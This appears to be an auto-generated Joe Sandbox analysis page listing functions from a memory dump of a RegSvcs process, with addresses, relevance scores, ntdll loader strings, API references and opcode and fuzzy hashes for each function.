Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $R$T${
API String ID: 0-4276472446
Opcode ID: 14bcf1ee7804a38e48f0cd32f239050f73bb8cbd62d3b7decce4fe1e6ddc7042
Instruction ID: 278846a1f4309b6946608fe13122c933d1558eacd5dbc8fb870ef9af6f088a22
Opcode Fuzzy Hash: 14bcf1ee7804a38e48f0cd32f239050f73bb8cbd62d3b7decce4fe1e6ddc7042
Instruction Fuzzy Hash: 70A21774A0562A8FDB74DF19CC887ADBBB5FB85304F1442EAD909AB251DB309E81CF40

Function 01604C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 01604C96
0, xrefs: 01604CC3

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: ccfc93dfd382882adc2e7f96ae56a4eb132fb40b83a48a1562115100c8ac77ed
Instruction ID: 3923babfc241541a0378b501b7a47ae0011aa1173f00a4dbaabc54b10d1ad762
Opcode Fuzzy Hash: ccfc93dfd382882adc2e7f96ae56a4eb132fb40b83a48a1562115100c8ac77ed
Instruction Fuzzy Hash: 77516AB2A002158FDF3ADF99CD8466AFBF4FF44714F54806AD2499B291EB709945CB80

Function 01654F40 Relevance: 5.2, Strings: 4, Instructions: 246COMMON

Download Yara Rule

Strings

.DLL, xrefs: 016550C7, 0165519C
/, xrefs: 01654F6D
\, xrefs: 01654F66
.Local, xrefs: 01655170

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\
API String ID: 0-80926707
Opcode ID: 7fa4d7d33105c8783f1b359a08fac82d7f641b169f221626d9a332c09789b0c6
Instruction ID: 1e5082ebea308d8839a4f6ae2174df9be92d5c7b4197a29fdf353e6f7d1837cd
Opcode Fuzzy Hash: 7fa4d7d33105c8783f1b359a08fac82d7f641b169f221626d9a332c09789b0c6
Instruction Fuzzy Hash: 5C91AF72D0061A8BCB61CF6CCC84AAEBBB5FF88310F594169E912EB350E735D941CB90

Function 015EAD00 Relevance: 4.3, Strings: 3, Instructions: 509COMMON

Download Yara Rule

Strings

LdrpInitializeDllPath, xrefs: 016380AD
minkernel\ntdll\ldrutil.c, xrefs: 016380B7
DLL search path passed in externally: %ws, xrefs: 016380A6

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: DLL search path passed in externally: %ws$LdrpInitializeDllPath$minkernel\ntdll\ldrutil.c
API String ID: 0-109579469
Opcode ID: b0affa71375dbda92fc51ab3a2230a040d259648bff52ba507369488f063ab40
Instruction ID: d4994f4d1450cfd1696eabb0d3fccddbbf4f19dc8aa5df851259435c51a5fa32
Opcode Fuzzy Hash: b0affa71375dbda92fc51ab3a2230a040d259648bff52ba507369488f063ab40
Instruction Fuzzy Hash: BD12D071A083428FD329DB28C884BBABBE5BFC4714F044A1DF9958F291E774D944CB92

Function 015F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 015F6C24
, xrefs: 0163CA51

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: b8eeb52d2a77fdf26ea0103aee5ab4e06508b03cc82e132f7ceaea6fb1221310
Instruction ID: 8d2db2bbfc6afa515623a8ca5c97eb3c31d05250c4011e409ee79f307cf9411e
Opcode Fuzzy Hash: b8eeb52d2a77fdf26ea0103aee5ab4e06508b03cc82e132f7ceaea6fb1221310
Instruction Fuzzy Hash: E9C25E71A083419FE725CF28C841BABBBE5BFC8754F04892EFA899B251D734D845CB52

Function 015D04E5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015D055E

Strings

kLsE, xrefs: 015D0540

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 100373b7d89ad7f2cfe39ed1bff2d8578904ea6386336f79eaf6cbbbd578b593
Instruction ID: aaa9729e94dd991c79246414c8e6f6bd1663a9b6acf15f137108d8134edb2ed4
Opcode Fuzzy Hash: 100373b7d89ad7f2cfe39ed1bff2d8578904ea6386336f79eaf6cbbbd578b593
Instruction Fuzzy Hash: 9551AC715047428FD734EF2CC4446ABBBE4BF85304F14483EEA9A8B281E770D545CBA2

Function 01652349 Relevance: 3.6, Strings: 2, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 01652B74
@, xrefs: 01652942

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 1bdcb210db9e8fd4b94226ce0fcfef94d74c315106a5caf31a67f0d2958f5b11
Instruction ID: 804dca72e213655456e686defb0aa09484388f1a65793a2254d2b18440f171a0
Opcode Fuzzy Hash: 1bdcb210db9e8fd4b94226ce0fcfef94d74c315106a5caf31a67f0d2958f5b11
Instruction Fuzzy Hash: E8928871608342EFE761CE29CC90B6BBBE9BB84754F04492DFA959B350D770E844CB92

Function 01604D1D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01604D64

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01643640, 0164366C

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3711822496
Opcode ID: a61a41153c900a6f3ebe436d037894c08ee39628db02b37aba8c3d02bc2452b1
Instruction ID: 93b2351e9e5e7a5026530446eef92faac17b644f0fec8d51c26a3c17da9ef57e
Opcode Fuzzy Hash: a61a41153c900a6f3ebe436d037894c08ee39628db02b37aba8c3d02bc2452b1
Instruction Fuzzy Hash: 2331B623900612AFDF3BAA0CCC99A7BB6A4FB01654F46416ADB04673D1EFA0DC8087D5

Function 01602CF0 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

@, xrefs: 01602E4D
.Local\, xrefs: 01602D91

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 404178c6bfb8112bfd9fba31c2bf2c34881a33eb3b60f937c7c93e712c3b2951
Instruction ID: 7120bc00ad47c9b36e49dc08598a5afd43c20f4f2a4090f333a8209d1a802672
Opcode Fuzzy Hash: 404178c6bfb8112bfd9fba31c2bf2c34881a33eb3b60f937c7c93e712c3b2951
Instruction Fuzzy Hash: 3F81A8B25043429FDB16CF18C8A4A6BBBE9BF95700F54885DF8948B385D770D944CBA2

Function 015D6A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013b4485579d763e027c10cf7c5bace689f6e3593028a461d0097b8379a858d2
Instruction ID: ff0aa990c6965bd93de0ae21316ed79e54e8fffced9df4c4084e58d4e527393a
Opcode Fuzzy Hash: 013b4485579d763e027c10cf7c5bace689f6e3593028a461d0097b8379a858d2
Instruction Fuzzy Hash: 05326B71A05215CFDB25CF6CC880AAEBBF1FF88310F148569E956AB391D774E842CB91

Function 015E0770 Relevance: 1.9, APIs: 1, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbbe90b168f32ef726cdc24e1e3e1c8425a953c35d956fb02d521bf82a4b2533
Instruction ID: 7f73723b03cefce74beeaf1da692ce3934ecdaea192dd47606829f4654a4904a
Opcode Fuzzy Hash: cbbe90b168f32ef726cdc24e1e3e1c8425a953c35d956fb02d521bf82a4b2533
Instruction Fuzzy Hash: 11F1AE70B00606DFEB29CF68C898B6AB7F5FF84704F1485A8E5569B381D774E981CB90

Function 015DCC74 Relevance: 1.9, Strings: 1, Instructions: 607COMMON

Download Yara Rule

Strings

9, xrefs: 015DCBA1

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2473173378
Opcode ID: 5ba5981f2f15b007851ec78acf2563637e702edc298ded154e0034a6913d8a17
Instruction ID: e0241dc44af2e8de27b0c815e8011a43f9dd557992018e742918493197f7b0eb
Opcode Fuzzy Hash: 5ba5981f2f15b007851ec78acf2563637e702edc298ded154e0034a6913d8a17
Instruction Fuzzy Hash: C3421875A002599FDB35CFADC880BEDFBB1BF48750F148169D919AB390EB70A981CB50

Function 015FE5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b842e588ba7d9deee93a0d2a4d1e1296feea4492143e3eeceb2965b7d5b1d4a
Instruction ID: e3ff295311dc6d1d977d8402c0faec7eeae6e30db8f794a982064f4de211bbb7
Opcode Fuzzy Hash: 3b842e588ba7d9deee93a0d2a4d1e1296feea4492143e3eeceb2965b7d5b1d4a
Instruction Fuzzy Hash: 69A12631E402599FEB21DB98CC45BAEBBB5FF40754F0601A9EB01AF2A1D7749D40CB92

Function 015DAF42 Relevance: 1.7, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

#, xrefs: 0163363D

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 53139dadbe123e5d7a6a0c3865e6308a4e034fe7b0c68cf12bc90e21b01765a0
Instruction ID: b418afbd3529aef64f0e84c9e278dcefec4d9c113f74b0aa345a3a6c77787519
Opcode Fuzzy Hash: 53139dadbe123e5d7a6a0c3865e6308a4e034fe7b0c68cf12bc90e21b01765a0
Instruction Fuzzy Hash: 7A02A1759002698BDF328B5CCC94BEEB7B6BF86340F1541E9D849AB351DB319E818F40

Function 0160CDB1 Relevance: 1.7, APIs: 1, Instructions: 197timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0160CE7D

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 021d9d3d74e5130108b8f9675222a3468b97b2f6cb2f65455a27e06c42bec75e
Instruction ID: 62dd4a2338b512e6fd897d2abcb210aeb747110aa7dd8fc83b501521bdc280b6
Opcode Fuzzy Hash: 021d9d3d74e5130108b8f9675222a3468b97b2f6cb2f65455a27e06c42bec75e
Instruction Fuzzy Hash: 00619F71A00206DFCB1ADFA8CC90AAEB7B9FF49314F144669EA11EB391D7709D41CB54

Function 015E03E9 Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01634D8A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: fb101b045cda1bb88a108df3018511a85356598c5c9d1965d0864d92959aa681
Instruction ID: a13b33bd23189430934764a026c8ff0af6f6da9311d16bd1e77aa0e2728bc652
Opcode Fuzzy Hash: fb101b045cda1bb88a108df3018511a85356598c5c9d1965d0864d92959aa681
Instruction Fuzzy Hash: C8713872E0014A9FDB05DFA8CD94BAEBBF8BF48744F144069E905AB251EB34ED01CB64

Function 016029F9 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 0164259B

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: b1a77585d8ed414c2d5e3573d9bfdc53c0d1df3243364d920a3d65149f49d74e
Instruction ID: f24d9719fd9955d94a87c832b878b2678c9e76e8e4842292e42b447d542e3e78
Opcode Fuzzy Hash: b1a77585d8ed414c2d5e3573d9bfdc53c0d1df3243364d920a3d65149f49d74e
Instruction Fuzzy Hash: A30280F1D002299BDB66DB54CC94BEAB7B8AF54304F1041DEE609A7281EB309E84CF59

Function 015F0C44 Relevance: 1.7, APIs: 1, Instructions: 152timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015F0CDC

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 94d9b1b2c56bb1fdc3f965114a0a5b0a8694349b54a077c30146e1b221232dbc
Instruction ID: d98f8fcc242cd6b6772551f339213d71674c2fca9f0284bcd16402ff974fef7d
Opcode Fuzzy Hash: 94d9b1b2c56bb1fdc3f965114a0a5b0a8694349b54a077c30146e1b221232dbc
Instruction Fuzzy Hash: BB51CE70A00206DFCB28DBA8CD85ABEB7F5FF84608F18442CE942DB751E735A941DB14

Function 0160C720 Relevance: 1.6, APIs: 1, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0160C7BF

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
